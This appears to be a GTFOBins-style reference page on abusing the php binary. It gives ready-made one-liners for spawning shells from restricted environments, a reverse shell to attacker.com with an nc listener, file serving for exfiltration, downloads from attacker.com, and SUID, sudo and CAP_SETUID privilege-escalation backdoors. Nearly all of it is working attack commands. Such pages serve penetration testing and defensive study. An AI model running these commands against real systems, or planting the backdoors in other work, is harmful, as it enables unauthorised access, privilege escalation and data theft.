.. / php

Star

• Shell
• Command
• Reverse shell
• File upload
• File download
• SUID
• Sudo
• Capabilities

Shell

It can be used to break out from restricted environments by spawning an interactive system shell.

• export CMD="/bin/sh"
  php -r 'system(getenv("CMD"));'

• export CMD="/bin/sh"
  php -r 'passthru(getenv("CMD"));'

• export CMD="/bin/sh"
  php -r 'print(shell_exec(getenv("CMD")));'

• export CMD="/bin/sh"
  php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'

• export CMD="/bin/sh"
  php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'

Command

It can be used to break out from restricted environments by running non-interactive system commands.

• export CMD="id"
  php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'

Reverse shell

It can send back a reverse shell to a listening attacker to open a remote network access.

• Run nc -l -p 12345 on the attacker box to receive the shell.

  export RHOST=attacker.com
  export RPORT=12345
  php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'

File upload

It can exfiltrate files on the network.

• Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.

  LHOST=0.0.0.0
  LPORT=8888
  php -S $LHOST:$LPORT

File download

It can download remote files.

• Fetch a remote file via HTTP GET request.

  export URL=http://attacker.com/file_to_get
  export LFILE=file_to_save
  php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

SUID

It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian that allow the default sh shell to run with SUID privileges.

• sudo sh -c 'cp $(which php) .; chmod +s ./php'
  
  CMD="/bin/sh"
  ./php -r "pcntl_exec('/bin/sh', ['-p']);"

Sudo

It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

• CMD="/bin/sh"
  sudo php -r "system('$CMD');"

Capabilities

It can manipulate its process UID and can be used on Linux as a backdoor to maintain elevated privileges with the CAP_SETUID capability set. This also works when executed by another binary with the capability set.

• cp $(which php) .
  sudo setcap cap_setuid+ep php
  
  CMD="/bin/sh"
  ./php -r "posix_setuid(0); system('$CMD');"